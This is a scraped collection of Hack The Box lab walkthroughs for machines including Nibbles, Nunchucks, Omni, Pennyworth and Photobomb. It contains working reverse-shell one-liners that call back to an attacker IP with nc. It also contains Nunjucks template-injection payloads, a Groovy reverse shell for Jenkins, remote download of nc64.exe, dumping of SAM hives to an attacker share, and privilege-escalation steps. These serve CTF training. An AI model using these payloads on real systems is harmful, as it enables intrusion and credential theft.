'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );\ndefine( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );\ndefine( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );\ndefine( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );\ndefine( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );\ndefine( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );\n\n/**\n * WordPress Database Table prefix.\n */\n$table_prefix = 'wp_';\n\n/**\n * For developers: WordPress debugging mode.\n * @link https://wordpress.org/support/article/debugging-in-wordpress/\n */\ndefine( 'WP_DEBUG', false );\n\n/** Absolute path to the WordPress directory. */\nif ( ! defined( 'ABSPATH' ) ) {\n        define( 'ABSPATH', __DIR__ . '/' );\n}\n\n/** Sets up WordPress vars and included files. */\nrequire_once ABSPATH . 'wp-settings.php';\n

    Some lines are different from the regular wp-config.php file of a Wordpress installation. They also provide credentials to access an ftp server:

    define( 'FS_METHOD', 'ftpext' );\ndefine( 'FTP_USER', 'metapress.htb' );\ndefine( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );\ndefine( 'FTP_HOST', 'ftp.metapress.htb' );\ndefine( 'FTP_BASE', 'blog/' );\ndefine( 'FTP_SSL', false );\n

    So... let's connect us to the ftp server:

    ftp 10.10.11.186\n\n# After this we will be asked for out username and password.\n# Enter username: metapress.htb\n# Enter password: 9NYS_ii@FyL_p5M2NvJ\n

    We can access two folders in the ftp server: blog and mailer. After browsing and inspecting the files, there is one that catches my attention: /mailer/sent_email.php. To get the file, run from the ftp server command line:

    mget send_email.php\n

    From our attacking machine we can see the content of that file:

    cat send_email.php\n

    Results:

    <?php\n/*\n * This script will be used to send an email to all our users when ready for launch\n*/\n\nuse PHPMailer\\PHPMailer\\PHPMailer;\nuse PHPMailer\\PHPMailer\\SMTP;\nuse PHPMailer\\PHPMailer\\Exception;\n\nrequire 'PHPMailer/src/Exception.php';\nrequire 'PHPMailer/src/PHPMailer.php';\nrequire 'PHPMailer/src/SMTP.php';\n\n$mail = new PHPMailer(true);\n\n$mail->SMTPDebug = 3;                               \n$mail->isSMTP();            \n\n$mail->Host = \"mail.metapress.htb\";\n$mail->SMTPAuth = true;                          \n$mail->Username = \"jnelson@metapress.htb\";                 \n$mail->Password = \"Cb4_JmWM8zUZWMu@Ys\";                           \n$mail->SMTPSecure = \"tls\";                           \n$mail->Port = 587;                                   \n\n$mail->From = \"jnelson@metapress.htb\";\n$mail->FromName = \"James Nelson\";\n\n$mail->addAddress(\"info@metapress.htb\");\n\n$mail->isHTML(true);\n\n$mail->Subject = \"Startup\";\n$mail->Body = \"<i>We just started our new blog metapress.htb!</i>\";\n\ntry {\n    $mail->send();\n    echo \"Message has been sent successfully\";\n} catch (Exception $e) {\n    echo \"Mailer Error: \" . $mail->ErrorInfo;\n}\n

    This script contains credentials of the user jnelson, that we had spotted before in the /etc/passwd file, but now we also have his password.

    From the initial enumeration of ports and services in the Metatwo machine, we know that ssh service is running. We try to login in to that service:

    # Quick install sshpass if you prefer to enter the ssh connection in one line.\n\nsudo apt install sshpass\nsshpass -p 'Cb4_JmWM8zUZWMu@Ys' ssh jnelson@10.10.11.186\n

    Now, you are in jnelson terminal. To get the user's flag, run:

    cat user.txt\n
    ","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-the-systems-flag","title":"Getting the System's flag","text":"

    Coming soon.

    ","tags":["walkthrough"]},{"location":"htb-metatwo/#some-other-write-ups-and-learning-material-related","title":"Some other write-ups and learning material related","text":"
    • https://tryhackme.com/room/wordpresscve202129447
    • Wpscan: CVE-2021-29447
    • https://www.maketecheasier.com/pgp-encryption-how-it-works/
    ","tags":["walkthrough"]},{"location":"htb-mongod/","title":"Walkthrough - A HackTheBox machine - Mongod","text":"

    Enumerate open services/ports:

    nmap -sC -sV $ip -Pn -p-\n

    Ports 22 and 27017 are open.

    mongo IP:port\n# in my case: mongo 10.129.228.30:27017 \n

    Now, use mongodb cheat sheet to browse the databases:

    show databases\nuse sensitive_information\nshow collections\ndb.flag.find()\n
    ","tags":["walkthrough","mongodb","port 27017"]},{"location":"htb-nibbles/","title":"Nibbles - A HackTheBox machine","text":"

    voy# Nibbles - A Hack The Box machine

    nmap -sC -sV -Pn 10.129.96.84 \n

    Results:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)\n|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)\n|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)\n80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html).\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Visiting the IP:80 in the browser and reviewing source code there is a comment:

    <!-- /nibbleblog/ directory. Nothing interesting here! -->\n

    So, we have a website at http://10.129.96.84/nibbleblog/

    Dirb enumeration reveals a login panel: http://10.129.96.84/nibbleblog/admin.php

    dirb http://10.129.96.84/nibbleblog/ /usr/share/wordlists/dirb/common.txt\n

    Too many login attempts too quickly trigger a lockout with the message \"Nibbleblog security error - Blacklist protection\".

    Also, dirb enumeration reveals some directories that are listable. Browsing around we get to this file: http://10.129.96.84/nibbleblog/content/private/users.xml where user \"admin\" is exposed.

    Also CMS version is disclosed in http://10.129.96.84/nibbleblog/README:

    ====== Nibbleblog ======\nVersion: v4.0.3\nCodename: Coffee\nRelease date: 2014-04-01\n

    A quick search for that version brings up this vulnerability:

    https://github.com/dix0nym/CVE-2015-6967/blob/main/README.md

    In the usage example we can read:

    python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php\n

    Default credentials are:

    admin:nibbles\n

    Also, reading the code of the exploit, we can see that the triggered endpoint for this CVE-2015-6967 is:

    uploadURL = f\"{nibbleURL}admin.php?controller=plugins&action=config&plugin=my_image\"\n

    Knowing this, we can login into the panel http://10.129.96.84/nibbleblog/admin.php and go to Plugins>My Image> Configure.

    In the browser, upload a file. In my case, I uploaded my pentesmonkey.

    Now, we need to find where this file has been saved to. After browsing around, I ended up in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/

    There there was a file called image.php. Before clicking on it, we open in our attacker machine a netcat listener:

    nc -lnvp 1234\n

    Click on the file image.php listed in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/ and you will have a reverse shell.

    Cat user.txt (under /home/nibbler).

    ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#privilege-escalation","title":"Privilege escalation","text":"
    sudo -l\n

    Results:

    $ sudo -l\nMatching Defaults entries for nibbler on Nibbles:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh\n

    At /home/nibbler, unzip the file personal.zip. Now you can even replace monitor.sh for a different monitor.sh. Mine has:

    /bin/bash\n

    Now run:

    sudo -u root .home/nibbler/personal/stuff/monitor.sh\n

    And you are root. Remember to do a chmod if needed.

    ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#some-input-from-htb-walkthrough","title":"Some input from HTB walkthrough","text":"

    You can run nmap script for nibbles service:

    nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190\n

    For privilege escalation:

    echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh\n

    Alternative way:

    msf6 > search nibbleblog\n\nmsf6 > use exploit/multi/http/nibbleblog_file_upload\n\nmsf6 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.129.42.190\nrhosts => 10.129.42.190\nmsf6 exploit(multi/http/nibbleblog_file_upload) > set lhost 10.10.14.2 \nlhost => 10.10.14.2\n

    We need to set the admin username and password admin:nibbles and the TARGETURI to nibbleblog.

    ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nunchucks/","title":"Nunchucks - A Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#users-flag","title":"User's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#enumeration","title":"Enumeration","text":"
    nmap -sC -sV 10.129.95.252 -Pn\n

    Open ports: 22, 80, and 443.

    Also http://nunchucks.htb is in results.

    Adding IP and domain nunchucks.htb to /etc/hosts.

    whatweb http://nunchucks.htb \n

    And some directory enumeration:

    feroxbuster -u https://nunchucks.htb -k\n

    Results:

    200      GET      250l     1863w    19134c https://nunchucks.htb/Privacy\n200      GET      245l     1737w    17753c https://nunchucks.htb/Terms\n200      GET      183l      662w     9172c https://nunchucks.htb/login\n200      GET      187l      683w     9488c https://nunchucks.htb/signup\n

    Trying to login into the application or signing up returns the following response message:

    {\"response\":\"We're sorry but user logins are currently disabled.\"}\n\n{\"response\":\"We're sorry but registration is currently closed.\"}\n

    Now, we will try some subdomain enumeration

    wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n

    Results: store

    We will add store.nunchucks.htb to /etc/hosts file.

    ","tags":["walkthrough"]},{"location":"htb-nunchucks/#exploitation","title":"Exploitation","text":"

    Browsing https://store.nunchucks.htb is a simple landing page to collect emails. There is a form for this purpose. After fuzzing it with Burpsuite we find this interesting output:

    Some code can get executed in that field. This vulnerability is known as Server-side Template Injection (SSTI)

    Once we have an injection endpoint, it's important to identify the application server and template engine running on it, since payloads and exploitation pretty much depends on it.

    From headers response we have: \"X-Powered-By: Express\".

    Having a look at template engines in Express at https://expressjs.com/en/resources/template-engines.html, there exists a Nunjucks, which is close the domain name nunchucks.

    This blog post describe how we can exploit this vulnerability: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

    Basically, I'm using the following payloads:

    {{range}}\n\n{{range.constructor(\\\"return global.process.mainModule.require('child_process').execSync('id')\\\")()}}\n\n{{range.constructor(\\\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\\\")()}}\n\n{{range.constructor(\\\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f')\\\")()}}\n

    The last one is a reverse shell. Before running it in BurpSuite Repeater, I've setup my listener with netcat on port 1234.

    ","tags":["walkthrough"]},{"location":"htb-nunchucks/#roots-flag","title":"Root's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#privileges-escalation","title":"Privileges escalation","text":"

    We'll abuse some process capability vulnerability to escalate to root. First we list processes capabilities:

    getcap -r 2>/dev/null\n

    Result:

    /usr/bin/perl = cap_setuid+ep\n/usr/bin/mtr-packet = cap_net_raw+ep\n/usr/bin/ping = cap_net_raw+ep\n/usr/bin/traceroute6.iputils = cap_net_raw+ep\n/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n

    We will use perl binary to escalate.

    echo -ne '#!/bin/perl \\nuse POSIX qw(setuid); \\nPOSIX::setuid(0); \\nexec \"/bin/bash\";' > pay.pl\nchmod +x pay.pl\n./pay.pl\n

    And you are root.

    ","tags":["walkthrough"]},{"location":"htb-omni/","title":"Walkthrough - Omni, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-omni/#about-the-machine","title":"About the machine","text":"data Machine Omni Platform Hackthebox url link OS Windows Difficulty Easy Points 20 ip 10.129.2.27","tags":["walkthrough"]},{"location":"htb-omni/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-omni/#enumeration","title":"Enumeration","text":"
    sudo nmap -sV -sC $ip -p-\n

    Results:

    PORT      STATE SERVICE  VERSION\n135/tcp   open  msrpc    Microsoft Windows RPC\n5985/tcp  open  upnp     Microsoft IIS httpd\n8080/tcp  open  upnp     Microsoft IIS httpd\n| http-auth: \n| HTTP/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Windows Device Portal\n|_http-title: Site doesn't have a title.\n|_http-server-header: Microsoft-HTTPAPI/2.0\n29817/tcp open  unknown\n29819/tcp open  arcserve ARCserve Discovery\n29820/tcp open  unknown\n
    ","tags":["walkthrough"]},{"location":"htb-omni/#exploiting-tcp-2981729820","title":"Exploiting TCP 29817/29820","text":"

    SirepRAT. Investigate

    # testing for an existing file\npython ~/tools/SirepRAT/SirepRAT.py $ip GetFileFromDevice --remote_path \"C:\\Windows\\System32\\drivers/etc/hosts\" --v\n\n# Place a nc64.exe file in the apache root server\nsudo cp ~/tools/nc64.exe /var/www/html\n\n# Start Apache server\nsudo service apache2 start\n\n# Upload nc64.exe: With SireRAT use cmd.exe in the victim's machine to lauch a powershell \npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c powershell Invoke-WebRequest -outfile c:\\windows\\system32\\nc64.exe -uri http://10.10.14.2/nc64.exe'\n\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c powershell Invoke-WebRequest -outfile c:\\windows\\system32\\nc64.exe -uri http://10.10.14.2/nc64.exe'\n\n\n# Open a listener in our attacker machine\nrlwrap nc -lnvp 443\n\n# Launch netcat in victim's machine via SirepRAT\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443'\n

    After browsing around we can see these interesting files:

    • C:\\Data\\Users\\administrator\\root.txt
    • C:\\Data\\Users\\app\\user.txt
    • C:\\Data\\Users\\app\\iot-admin.xml
      • C:\\Data\\Users\\app\\hardening.txt

    user.txt and root.txt \u00a0are PSCredential files with this format. To decrypt their passwords, we will need the user\u2019s password and the administrator's password. There are several approaches to obtain them:

    ","tags":["walkthrough"]},{"location":"htb-omni/#path-1-creds-in-a-file","title":"Path 1: creds in a file","text":"

    Evaluate all files until you get to C:\\Program Files\\WindowsPowershell\\Modules\\PackageManagement. Use powershell so you can run:

    ls -force\ntype r.bat\n

    Result:

    @echo off\n\n:LOOP\n\nfor /F \"skip=6\" %%i in ('net localgroup \"administrators\"') do net localgroup \"administrators\" %%i /delete\n\nnet user app mesh5143\nnet user administrator _1nt3rn37ofTh1nGz\n\nping -n 3 127.0.0.1\n\ncls\n\nGOTO :LOOP\n\n:EXIT\n
    ","tags":["walkthrough"]},{"location":"htb-omni/#path-2-dump-samsystemsecurity-hives-extract-hashes-and-crack-them","title":"Path 2: Dump sam/system/security hives, extract hashes and crack them","text":"

    We will dump the SAM database to the attacker's machine. For that, first we will create a share in the attacker's machine:

    # First crate the share CompData in our attacker's machine\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username \"username\" -password \"agreatpassword\"\n
    #  After that, establish the connection with nc\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c net use \\\\10.10.14.2\\CompData /u:username agreatpassword'\n

    After that we can dump the hives: sam, system, and security:

    # Now we will dump the hives we need. First, the SAM database\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\sam \\\\10.10.14.2\\CompData\\sam'\n\n# Secondly, system\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\system \\\\10.10.14.2\\CompData\\system'\n\n# Thirdly, security\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\security \\\\10.10.14.2\\CompData\\security'\n

    From the attacker's machine now, we can use secretdump.py to extract the hashes:

    secretsdump.py -sam sam -security security -system system LOCAL\n

    From that we will obtain the following NTLM hashes:

    Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra\n\n[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::\nsshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::\nDevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::\napp:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::\n

    We can crack them with hashcat:

    hashcat -m 1000 -O -a3 -i hashes.txt\n
    ","tags":["walkthrough"]},{"location":"htb-omni/#exploiting-tcp-8080","title":"Exploiting TCP 8080","text":"

    Credentials obtained for user \"app\" and \"administrator\" are valid to login into the portal that we observed previously in port 8080.

    Login as app, and go to the option \"Run Command\"

    From the attacker's machine, get a terminal listening:

    rlwrap nc -lnvp 443\n

    In the Run command screen, run:

    c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

    The listener will display the connection. Now:

    # Launch powershell\npowershell\n\n# Go to \ncd C:\\Data\\Users\\app\n\n# Decrypt the PSCredential file\n(Import-CliXml -Path user.txt).GetNetworkCredential().Password\n

    As a result your will obtain the user.txt's flag.

    ","tags":["walkthrough"]},{"location":"htb-omni/#get-roottxt","title":"Get root.txt","text":"

    Logout from the portal as user \"app\" and login again as administrator.

    From the attacker's machine, get a terminal listening:

    rlwrap nc -lnvp 443\n

    In the Run command screen, run:

    c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

    The listener will display the connection. Now:

    # Launch powershell\npowershell\n\n# Go to \ncd C:\\Data\\Users\\administrator\n\n# Decrypt the PSCredential file\n(Import-CliXml -Path root.txt).GetNetworkCredential().Password\n

    As a result your will obtain the root.txt's flag.

    ","tags":["walkthrough"]},{"location":"htb-oopsie/","title":"Oopsie - A Hack The Box machine","text":"
    nmap -sC -sV $ip -Pn\n
    Host is up (0.034s latency).\nNot shown: 998 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)\n|   256 241da417d4e32a9c905c30588f60778d (ECDSA)\n|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)\n80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Welcome\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Open browser. From scripts called in home page you extract this path:

    <script src=\"/cdn-cgi/login/script.js\"></script>\n

    Then you are in a login page that provides a way to login as a guest.

    When logged in, and being a guest pay attention to cookies:

    Now, in browser change id 2 to id 1 to see if data from other user is exposed.

    It is. Change the value of the cookies in the browser to be admin.

    Upload a php reverse shell. I usually use the pentesmonkey one.

    Now I use gobuster to enum possible locations for the upload:

    gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -t 20\n
    ===============================================================\nGobuster v3.5\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http://10.129.95.191\n[+] Method:                  GET\n[+] Threads:                 20\n[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster/3.5\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n/images               (Status: 301) [Size: 315] [--> http://10.129.95.191/images/]\n/themes               (Status: 301) [Size: 315] [--> http://10.129.95.191/themes/]\n/uploads              (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]\n/css                  (Status: 301) [Size: 312] [--> http://10.129.95.191/css/]\n/js                   (Status: 301) [Size: 311] [--> http://10.129.95.191/js/]\n/fonts                (Status: 301) [Size: 314] [--> http://10.129.95.191/fonts/]\nProgress: 87567 / 87665 (99.89%)\n===============================================================\n==============================================================\n

    Nice, but being user admin I can not get into http://10.129.95.191/uploads/.

    Is there any other user with more permissions? I will use BurpSuite Intruder to enumerate possible users based on object serialization (id). This would be the endpoint: http://10.129.95.191/cdn-cgi/login/admin.php?content=accounts&id=30

    User id 30 is super admin. With this I update my cookies and now I'm able to access http://10.129.95.191/uploads/pentesmonkey.php. Before that:

    nc -lnvp 1234\n
    ","tags":["walkthrough"]},{"location":"htb-pennyworth/","title":"Pennyworth - A HackTheBox machine","text":"
    nmap -sC -sV $ip -Pn -p-\n

    Port 8080 is open and from browser we can see a login page of a jenkin service. Version is not displayed.

    Running this request through Burpsuite intruder

    POST /j_spring_security_check HTTP/1.1\nHost: 10.129.228.92:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\nOrigin: http://10.129.228.92:8080\nConnection: close\nReferer: http://10.129.228.92:8080/login?from=%2F\nCookie: JSESSIONID.4f24ed31=node0de80ew54idnc17ajfpe13p5hc0.node0\nUpgrade-Insecure-Requests: 1\n\nj_username=admin&j_password=!@#$%^&from=%2F&Submit=Sign+in\n

    Payload will be in password parameter. You can use several dictionaries. In the sampled request the response will be a 500 response code with Jenkin version visible at the footer:

    <div class=\"page-footer__links page-footer__links--white jenkins_ver\"><a rel=\"noopener noreferrer\" href=\"https://jenkins.io/\" target=\"_blank\">Jenkins 2.289.1</a></div>\n

    Default password for the service (admin:password) doesn't work. By performing some brute force attack with basic dictionaries, password is root:password

    Nice repository for pentesting jenkins. I guess there might be several approaches and solutions to this machine. In my case, I used the Script console provided in jenkins with the following payload:

    String host=\"myip\";\nint port=1234;\nString cmd=\"/bin/bash\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n

    After that:

    whoami\ncat /root/flag.txt\n
    ","tags":["walkthrough"]},{"location":"htb-photobomb/","title":"Walkthrough - Photobomb, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-photobomb/#about-the-machine","title":"About the machine","text":"data Machine Photobomb Platform Hackthebox url link creator slartibartfast OS Linux Release data 08 October 2022 Difficulty Easy Points 20 ip 10.10.11.182","tags":["walkthrough"]},{"location":"htb-photobomb/#recon","title":"Recon","text":"

    For the sake of commodity, we'll create a variable:

    export ip=10.10.11.182\n
    ","tags":["walkthrough"]},{"location":"htb-photobomb/#service-port-enumeration","title":"Service/ Port enumeration","text":"

    Run nmap to enumerate open ports, services, OS, and traceroute

    General enumeration not to make too much noise:

    sudo nmap $ip -Pn\n
    Results:
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-20 12:34 EDT\nNmap scan report for 10.10.11.182\nHost is up (0.095s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT   STATE SERVICE\n22/tcp open  ssh\n80/tcp open  http\n
    Once you know open ports, run nmap to see service versions and more details:
    sudo nmap -sCV -p22,80 $ip\n
    Results:
    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)\n|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)\n|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)\n80/tcp open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to http://photobomb.htb/\n|_http-server-header: nginx/1.18.0 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
    We open 10.10.11.182 in the browser. A redirection to http://photobomp.htb occurs, but the server is not found. So we add this routing in our /etc/hosts file:

    We open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n
    We move the cursor to the end and we add these lines:
    10.10.11.182    photobomb.htb\n

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#directory-enumeration","title":"Directory enumeration","text":"

    We can use dirbuster to enumerate directories:

    dirbuster\n
    And we configure it to launch this dictionary: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

    Results:

    Dirs found with a 200 response:\n\n/\n\nDirs found with a 401 response:\n\n/printer/\n/printers/\n/printerfriendly/\n/printer_friendly/\n/printer_icon/\n/printer-icon/\n/printer-friendly/\n/printerFriendly/\n/printersupplies/\n/printer1/\n\n\n--------------------------------\nFiles found during testing:\n\nFiles found with a 401 response:\n\n/printer\n/printer.php\n/printers.php\n/printerfriendly.php\n/printer_friendly.php\n/printer_icon.php\n/printer-friendly.php\n/printerFriendly.php\n/printersupplies.php\n/printer1.php\n\nFiles found with a 200 response:\n\n/photobomb.js\n

    As we wait, we do a dns enumeration:

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#dns-enumeration","title":"DNS enumeration","text":"

    Running:

    nslookup\n
    And after that:
    > SERVER 10.10.11.182\n
    Results:
    Default server: 10.10.11.182\nAddress: 10.10.11.182#53\n
    Then, we run:
    > 10.10.11.182\n
    And as a result, we have:
    ** server can't find 182.11.10.10.in-addr.arpa: NXDOMAIN\n
    So there is no result.

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#exploiting-the-login-page","title":"Exploiting the login page","text":"

    At http://photobomb.htb/printer we find a login page. Use Burp to capture the request of a failed login using \"username\" as username and \"password\" as a password.

    GET /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://photobomb.htb/\nUpgrade-Insecure-Requests: 1\nAuthorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=\n
    The authorization is the text \"username:password\" encoded in base64, which is known as Basic HTTP Authentication Scheme.

    After trying to brute force the login page with different seclist dictionaries, we decided to have a look at the only file with response 200 in the directory enumeration: http://photobomb.htb/photobomb.js, and bingo! The user and password are there:

    function init() {\n  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me\n  if (document.cookie.match(/^(.*;)?\\s*isPhotoBombTechSupport\\s*=\\s*[^;]+(.*)?$/)) {\n    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');\n  }\n}\nwindow.onload = init;\n
    We login into the web with: + user: pH0t0 + password: b0Mb!

    After entering user+pass a pannel to download images is displayed. Capturing with BurpSuite this HTTP request to download an image we have:

